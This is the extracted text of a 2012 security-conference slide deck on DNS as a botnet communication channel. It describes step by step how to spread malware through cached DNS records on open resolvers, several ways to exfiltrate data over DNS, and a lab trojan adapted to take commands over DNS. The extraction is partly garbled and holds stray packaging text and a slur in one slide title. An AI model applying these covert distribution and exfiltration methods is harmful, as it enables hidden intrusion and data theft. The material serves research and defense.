#rootedcon2012 - dns: a botnet dialect - carlos diaz & francisco j. gomez
DESCRIPTION
Showed in RootedCON 2012, Madrid. Review Cloud Malware Distribution and shows data-leak methods. Release new Flu-trojan flavor that uses DNS as communication channel.TRANSCRIPT
CMD: Look who’s talking too
DNS: a botnet dialect
Francisco J. Gómez Rodríguez ([email protected]): • Computer Engineering (EUI-‐UPM) • Security Research (Telefonica R&D) • dig fran.rootedcon.themafia.info TXT
Carlos Díaz Hidalgo ([email protected]): • TelecommunicaGons Engineer (ETSITM-‐UPM), GPEN, GCIH,
OPST, ITILF and CCNA. • Technology Specialist in Ethical Hacking (Telefonica R&D) • dig charlie.rootedcon.themafia.info TXT
look who’s talking too
This presenta9on contains: one year ago ………………………………………….... 3 mg cloud malware distribuGon …………………..…. 10 mg dns is in the air ………………………………………… 10 mg suspicion …………………………………………………. 8 mg data leak …………………………………………………. 10 mg laboratory ………………………………………………. 10 mg
THIS PACKAGE FOR HOUSEHOLDS WITHOUT YOUNG CHILDREN
Tamper-‐Evident: Do not accept if sealed blister unit has been broken or opened
Nasal Spray
4.4 FL OZ (130mL)
INTRODUCTION
One year ago …
• We talked about DNS and Malware. • We released Cloud Malware DistribuGon (CMD): – An alternaGve method for malware distribuGon using Cache DNS services.
– Using client default DNS se_ngs. – Malware source virtually untraceable.
A DNS shot
CMD Cloud Malware DistribuGon in a nutshell
Cloud Malware DistribuGon 1. Encoding: Split malware payload into DNS Records.
2. Publishing: Publish domain and each record in a public Name Server.
3. Loading: Force an Open Emi`er DNS Cache Server to store all records.
4. Downloading: Download records from an infected host (bot).
5. Decoding: Rebuild malware payload from records.
1,2 3
Open Emi`er DNS
4
8rjqerkjqet.cmdns.domain.com ueirytbdosu.cmdns.domain.com ktqtr53xase.cmdns.domain.com kzmfzzmfzze.cmdns.domain.com
8rjqerkjqet.cmdns.domain.com ueirytbdosu.cmdns.domain.com ktqtr53xase.cmdns.domain.com kzmfzzmfzze.cmdns.domain.com
5
Cloud Malware DistribuGon (I) 8rjqerkjqet.cmdns.domain.com
ueirytbdosu.cmdns.domain.com
ktqtr53xase.cmdns.domain.com
kzmfzzmfzze.cmdns.domain.com
8rjqerkjqet ueirytbdosu ktqtr53xase kzmfzzmfzze
Encoding & Pub
lish
DNS AUTH Freedns.afraid.org
8rjqerkjqetueirytbdosuktqtr53xasekzmfzzmfzze
8rjqerkjqet.cmdns.domain.com
ueirytbdosu.cmdns.domain.com
ktqtr53xase.cmdns.domain.com
kzmfzzmfzze.cmdns.domain.com
• From malware file we create a base32 coded string.
• So we split the string into DNS compliance records.
Cloud Malware DistribuGon(II)
Open Emi`er DNS
8rjqerkjqet.cmdns.domain.com
ueirytbdosu.cmdns.domain.com
ktqtr53xase.cmdns.domain.com
kzmfzzmfzze.cmdns.domain.com
8rjqerkjqet.cmdns.domain.com
ueirytbdosu.cmdns.domain.com
ktqtr53xase.cmdns.domain.com kzmfzzmfzze.cmdns.domain.com
Loading
cmdns.domain.com NS?
Split[1..n].cmdns.domain.com A?
• We upload each DNS record from a malicious DNS to Open Emi`er.
• This is made by requesGng each record to Open Emi`er DNS.
• Then Server caches each record.
DNS AUTH Freedns.afraid.org
Cloud Malware DistribuGon (III)
Open Emi`er DNS
Downloading
DNS AUTH
Freedns.afraid.org
• Since the Open Emi`er Server has cached all records we convert it into a domain authoritaGve domain server.
• From now on, Open Emi`er will resolve all domain queries. • Thus, all Internet DNS servers can resolve malware records and
bots can get them.
8rjqerkjqet.cmdns.domain.com ueirytbdosu.cmdns.domain.com ktqtr53xase.cmdns.domain.com kzmfzzmfzze.cmdns.domain.com
Cloud Malware DistribuGon (IV)
Decoding
8rjqerkjqetueirytbdosuktqtr53xasekzmfzzmfzze
8rjqerkjqet.cmdns.domain.com
ueirytbdosu.cmdns.domain.com
ktqtr53xase.cmdns.domain.com
kzmfzzmfzze.cmdns.domain.com
• With all the retrieved records bots can rebuild the original file.
• Bot has now updated the malware file.
Own survey : yesterday and today
Febrero de 2011
España EEUU
Queried hosts 10.406 10.406
Replying hosts 87,22% 87,39%
Open resolvers 76,46% 77,28%
Open emi`ers 57,76% 57,33%
Accept +norecurse queries 55,91% 55,49%
TTL ≥ 604800 43,05% 42,94%
Marzo de 2012
España EEUU
8217 8217
87,58% 87,69%
95,45% 82,08%
53,78% 53,51%
87,67% 74,44%
51,24% 49,32%
A quick test…
In the same way the SSL turns HTTP web traffic into HTTPS encrypted Web traffic, DNSCrypt turns regular DNS traffic into encrypted DNS traffic that is secure from eavesdropping and man-‐in-‐the-‐middle a`acks.
DNSCrypt
… a quick demo.
Summary: We can use DNSCrypt and CMD Method works.
DNS IS IN THE AIR DNS: yesterday, today, and tomorrow
Are you talking to me?
• Let’s see some about… – DNS as covert channel. – DNS uses in malware communicaGons.
l DNS as Covert Channe
• OzymanDNS (Kaminsky) • Dnscapy • (NSTX) Iodine: Use several RR types, NULL,TXT,CNAME)
• Dns2tcp & TCP-‐over-‐DNS: relay TCP connecGons. • LoopcVPN One of China-‐Telecom Hotspot nightmare.
Are you talking to me?
• Let’s see some about… – DNS as covert channel. – DNS uses in malware communicaGons.
Stateless malware (I) • TSPY_ZBOT.SMQH
– Another Modified ZeuS Variant Seen in the Wild. – Reported in September 2011 by Trendmicro. – Data exchange is also now happening in UDP. – http://blog.trendmicro.com/another-modified-zeus-variant-seen-in-the-wild/
Stateless malware(II) • Older version using TCP to exchange configura7on files. However,
The new version exchanges all data in UDP – http://www.symantec.com/connect/blogs/zeusbotspyeye-p2p-updated-fortifying-botnet
Stateless malware(II) • Older version using TCP to exchange configura7on files. However,
The new version exchanges all data in UDP – http://www.symantec.com/connect/blogs/zeusbotspyeye-p2p-updated-fortifying-botnet
TCP
Where there's smoke, there's fire.
Feedorbot
• Using DNS protocol. – Feedorbot share encrypted commands from C&C. – Encapsuling data in TXT records and Base64 encoded. – http://www.cj2s.de/On-Botnets-that-use-DNS-for-Command-and-Control.pdf
HiloG
• Thanks DNS querys HiloG monitors infected host status. – h`p://blog.forGnet.com/hiloG-‐the-‐botmaster-‐of-‐disguise
142625.bc7a3d45.01.0AC1FD9D62074E6D9D2889088284DAB5.n.empty.1148.empty.5_1._t_i.ffffffff.explorer_exe.173.rc2.a4h9uploading.com
• Although It uses DNS as control protocol, bots download update files from “file hosGng” servers by HTTP.
Morto
• From IRC to DNS. – Morto, like Feedorbot, uses TXT records to comnunicate. – http://www.symantec.com/connect/blogs/morto-worm-sets-dns-record
GATHERING & EVALUATING INFORMATION
Gathering & EvaluaGng InformaGon (I)
• h`p://www.wombat-‐project.eu/
• h`p://exposure.iseclab.org/index.html
Gathering & EvaluaGng InformaGon (II) • h`ps://dnsdb.isc.org/#Home
• h`p://www.webboar.com
Gathering & EvaluaGng InformaGon (III) • Don´t forget the classics:
– h`p://www.robtex.com/
Learned in #Rooted2012 • h`p://labs.alienvault.com/labs/index.php/projects/open-‐source-‐ip-‐reputaGon-‐portal/
SomeGmes … I see dead people
• September, 2011 (Top 10 Malicious Domains)
Scratch & Win
Ten Li`le Niggers • h`p://www.webboar.com/ip/67.15.149.70/
– 25 Domain(s) on IP Address 67.15.149.70 • azxdf.com • mjuyh.com • hjuyv.com • plokm.com • nbgtr.com • vcxde.com • asljd.com • bruGllor5.com
• civiGcle0.com • ckubf.com • djhbw.com • himovingto8.com • hiuxd.com • liunj.com • loijm.com • mjrth.com
• morewallfalls7.com • okjyu.com • orn2hcb.com • qlovg.com • quiluGon2.com • uncdt.com • xvfar.com • zscdw.com • zukamosion3.com
SomeGmes … I see dead people
CMD could be alive!
DATA LEAK OVER DNS
DATA LEAK OVER DNS
TradiGonal data leak using DNS
1
Bot
DataLeakRecord2.[OUTPUT_DOMAIN] [OUTPUT_DOMAIN] DataLeakRecord1
DataLeakRecord2
…
DataLeakRecord1.[OUTPUT_DOMAIN]
2
Cache DNS (public or private) DNS Auth.
OUTPUT_DOMAIN
Using a DNS reflector
1
Bot [PUBLICATION_DOMAIN] Data1 Data2
…
DataLeakRecord1.[OUTPUT_DOMAIN]
2
Cache DNS (public or private)
DNS Auth. (OUTPUT_DOMAIN)
DNS Auth. (Open emi`er + cache) PUBLICATION_DOMAIN
Force Data Leak Upload CMD
3
Cache DNS
4
5
(PUBLICATION_DOMAIN) Data1 -‐> DataLeakRecord1
Data1.[PUBLICATION_DOMAIN]
Data1
Data1 -‐> DataLeakRecord1
DNS reflector (demo)
Using Fast-‐Flux DNS reflectors
DataLeakRecord1.[OUTPUT_DOMAIN]
1
Bot [PUBLICATION_DOMAIN] Data1 Data2
…
DataLeakRecord1.[OUTPUT_DOMAIN]
2
Cache DNS (public or private)
DNS Auth. (OUTPUT_DOMAIN)
DNS Auth. (Open emi`er + cache)
Force Data Leak Upload CMD
3
Cache DNS
4
5
(PUBLICATION_DOMAIN) Data1 -‐> DataLeakRecord1
Data1.[PUBLICATION_DOMAIN]
Data1
Data Leak using NXDOMAIN responses
• NXDOMAIN responses are cached: – NegaGve caching is useful. – TTL value: The SOA 'minimum' parameter is used as the negaGve (NXDOMAIN) caching Gme (defined in RFC 2308).
• Other queries may reuse some parts of the lookup (quick response).
Caching NXDOMAIN responses (I)
Caching NXDOMAIN responses (II)
Caching NXDOMAIN responses (III)
Data leak with “dig”
RCODE
TTL
QUERY TIME
Leak recovery with “dig” (I)
TTL < 86400
QUERY TIME < 300 msec
Leak recovery with “dig” (II)
TTL = 86400
QUERY TIME approx. 300 msec
It is not a good method for recovery!
Leak recovery with “dig” (III)
TTL < 86400
QUERY TIME < 300 msec
Leak recovery with “dig” (IV)
RCODE ≠ NXDOMAIN
QUERY TIME < 300 msec
It is the preferred method for recovery!
DataLeakRecord1.[OUTPUT_DOMAIN] ataLeakRecord1.[OUTPUT_DOMAIN]
dataleakrecord1.
[OUTPUT_DOMAIN] ataleakr
ecord1.[OUTPUT_D
OMAIN]
Data Leak using NXDOMAIN responses da
tale
akre
cord
1 1
Bot
d1.[OUTPUT_DOMAIN] 1.[OUTPUT_DOMAIN]
2 DNS (Open emi`er + cache)
1.[OUTPUT_DOMAIN
]
d1.[OUTPUT_DOMAI
N]
rd1.[OUTPUT_DOMA
IN] …
DNS Auth. (OUTPUT_DOMAIN)
…
b.[OUTPUT_DOMAIN] a.[OUTPUT_DOMAIN]
…
DataLeakRecord1.[OUTPUT_DOMAIN] ataLeakRecord1.[OUTPUT_DOMAIN]
dataleakrecord1.
[OUTPUT_DOMAIN] ataleakr
ecord1.[OUTPUT_D
OMAIN]
Data Leak using NXDOMAIN responses da
tale
akre
cord
1 1
Bot
d1.[OUTPUT_DOMAIN] 1.[OUTPUT_DOMAIN]
2 DNS (Open emi`er + cache)
3
1.[OUTPUT_DOMAIN
]
d1.[OUTPUT_DOMAI
N]
rd1.[OUTPUT_DOMA
IN] …
DNS Auth. (OUTPUT_DOMAIN)
…
dataleakrecord1
z.[OUTPUT_DOMAIN] 1.[OUTPUT_DOMAIN] a1.[OUTPUT_DOMAIN] …
QUERY: +norecurse
RESPONSE: RCODE? TTL value?
Query Gme?
NXDOMAIN (demo)
Data Leak using “nice” domains
• There are authoritaGve DNS server that: – Simply point all unknown DNS queries to a single IP address.
– Minimum TTL value on the order of 1-‐7 days.
• Where can I find them? – Alexa “Tops Sites”: h`p://www.alexa.com/topsites
inbox.com imgur.com motherless.com wikia.com wikispaces.com pbworks.com …
Caching ‘nice’ responses (II)
Caching ‘nice’ responses (II)
Data Leak using ‘nice’ domains da
tale
akre
cord
1 1
Bot
d1.[OUTPUT_DOMAIN] 1.[OUTPUT_DOMAIN]
2 DNS (Open emi`er + cache)
1.[OUTPUT_DOMAIN
]
d1.[OUTPUT_DOMAI
N]
rd1.[OUTPUT_DOMA
IN] …
ataleakrecord1.[
OUTPUT_DOMAIN]
dataleakrecord1.
[OUTPUT_DOMAIN]
‘nice’ DNS Auth. (OUTPUT_DOMAIN)
…
DataLeakRecord1.[OUTPUT_DOMAIN] ataLeakRecord1.[OUTPUT_DOMAIN]
Data Leak using ‘nice’ domains da
tale
akre
cord
1 1
Bot
d1.[OUTPUT_DOMAIN] 1.[OUTPUT_DOMAIN]
2 DNS (Open emi`er + cache)
3
1.[OUTPUT_DOMAIN
]
d1.[OUTPUT_DOMAI
N]
rd1.[OUTPUT_DOMA
IN] …
ataleakrecord1.[
OUTPUT_DOMAIN]
dataleakrecord1.
[OUTPUT_DOMAIN]
‘nice’ DNS Auth. (OUTPUT_DOMAIN)
…
DataLeakRecord1.[OUTPUT_DOMAIN] ataLeakRecord1.[OUTPUT_DOMAIN]
a.[OUTPUT_DOMAIN]
dataleakrecord1
b.[OUTPUT_DOMAIN] z.[OUTPUT_DOMAIN] 1.[OUTPUT_DOMAIN] a1.[OUTPUT_DOMAIN] … …
QUERY: +norecurse
ANSWER SECTION? TTL value?
Conclusions data-‐leak
Use client default DNS seings
Upload queries needed
Expose cybercrime
infrastructure
Download queries needed
Score (0-‐10)
TradiGonal DNS tunneling YES 2 queries/kB YES -‐ 5
Using Fast-‐Flux DNS reflectors YES 2 queries/kB YES 2 queries/kB 4
Using NXDOMAIN response
NO 2 queries/B NO 20 queries/B 2
Using “nice” domains NO 2 queries/B NO 20 queries/B 6
ToDo: Improvement++ • Data Leak using ‘nice’ domains. But remembering that: – Must use client default DNS se_ngs.
• Maybe can use three party resources … (once again) – … Use misconfigured DNS (proxy DNS, cache DNS, authoritaGve server, …).
– e.g. must ignore “+norecurse” flag, “minimal-‐response” configured, etc.
• Result: Untraceable data leaks
Harder than finding a needle in a haystack!
LABORATORY Are we infected?
Making the lab.
• We need a “real” threat… • But we are “ethical”… • And we are not developers…
Searching…
And the winner is…
• Wri`en in C# and PHP • GNU/GPL • Geared to build botnets • HTTP communicaGon
How Flu works
• Flu server share XML commands file. • Infected hosts get XML file through
HTTP request.
Flu Infected Host
Flu SERVER
HTTP
Flu and CMD
• We use CMD to distribute XML commands file. • Our dream: Flu become stateless Trojan. • Then we’ll have stateless-‐Trojan-‐GPL botnet.
Open Emi`er DNS
Flu Infected Host
Flu DNS
DNS DNS
HTTP/TCP DNS/UDP
Vs 1 query 2 pkts. 0 conn.
1 GET 11 pkts. 1 conn.
Flu and CMD: Server
• PHP 5.3.0 or higher required. • Three steps:
1. domain.db file create. (external lib: Tar.php) 2. Load XML file into DNS server. (NaGve lib) 3. Download data from infected host. (NaGve lib)
Flu and CMD: 3th Party
• ISC Bind • FreeDNS.afraid.org • HE free DNS service • Misconfigured DNS server.
Open Emi`er
Flu and CMD: 3th Party
• ISC Bind • FreeDNS.afraid.org • HE free DNS service • Misconfigured DNS server.
Open Emi`er
Flu and CMD: Client
• We use ARSoD.Tools.Net library. • Without GUI changes:
– We use domainload to data leak. – We use domaindownload to get XML file.
Flu and CMD: How it works (I)
Open Emi`er DNS
Flu Infected Host
Flu DNS
DNS DNS
XML2DNS LOADXML DOWNLOADXML
Flu and CMD: How it works (II)
Open Emi`er DNS
Flu Infected Host
Flu C&C
DNS DNS
• How flu call back? – NXDOMAIN can: Track new bots. – NXDOMAIN can’t: Send huge files.
DNS Server Nxdomainquery Noerror
Nxdomainquery Noerror
Flu and CMD: How it works (II)
Open Emi`er DNS
Flu Infected Host
Flu C&C
DNS DNS
1. How flu call back? – NXDOMAIN can: Track new bots. – NXDOMAIN can’t: Send huge files.
2. Then… we need to expose DNS server.
Cache DNS
Flu Infected Host
Flu DNS
DNS DNS
Nxdomainquery Noerror DNS Server
Nxdomainquery Noerror
2
1
Flu and CMD: Demo
Conclusions
• DNS is a botnet dialect… – One year ago DNS was a possibility, today could be a real threat.
• Data leak using DNS need an improvement… – ...but we are working progress.
• Malware need to communicate undetected, and IDS want to detect malware. – Both must be looking for the same… DNS.
• Don’t forget DNS Protocol
QuesGons?
Who invented the rootedcon?
Rootedcon is your parents
Three Magic Kings Santa
Perez the mouse
References § h`p://code.kryo.se/iodine/ § h`p://dns.measurement-‐factory.com/ § h`p://darkwing.uoregon.edu/~joe/secprof10-‐dns/secprof10-‐dns.pdf § h`p://www.blackhat.com/presentaGons/bh-‐europe-‐05/BH_EU_05-‐Kaminsky.pdf § h`p://www.blackhat.com/presentaGons/bh-‐usa-‐04/bh-‐us-‐04-‐kaminsky/bh-‐us-‐04-‐kaminsky.ppt § h`p://www.pcworld.com/arGcle/220024/feds_accidentally_seize_84000_innocent_domains_link_them_with_child_porn.html § h`p://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf § h`p://www.secdev.org/projects/scapy/ § h`ps://www.isc.org/so�ware/bind/documentaGon/arm95#man.dig § h`p://dns.measurement-‐factory.com/cgi-‐bin/openresolvercheck.pl § h`p://hakin9.org/magazine/1652-‐mobile-‐malware-‐the-‐new-‐cyber-‐threat § h`p://www.ie�.org/rfc/rfc{1033,1034,1035,1183,2181}.txt § h`p://tools.ie�.org/id/dra�-‐cmd-‐prevent-‐malware-‐dns-‐distribute-‐00.txt § h`p://www.wombat-‐project.eu/ § h`p://exposure.iseclab.org/index.html § h`ps://dnsdb.isc.org/#Home § h`p://www.webboar.com § h`ps://dns.he.net/ § h`p://www.flu-‐project.com/ § h`p://arso�toolsnet.codeplex.com/
Thanks for your Gme! @{Hlexpired,ffranz} {charlie,fran}@7d.es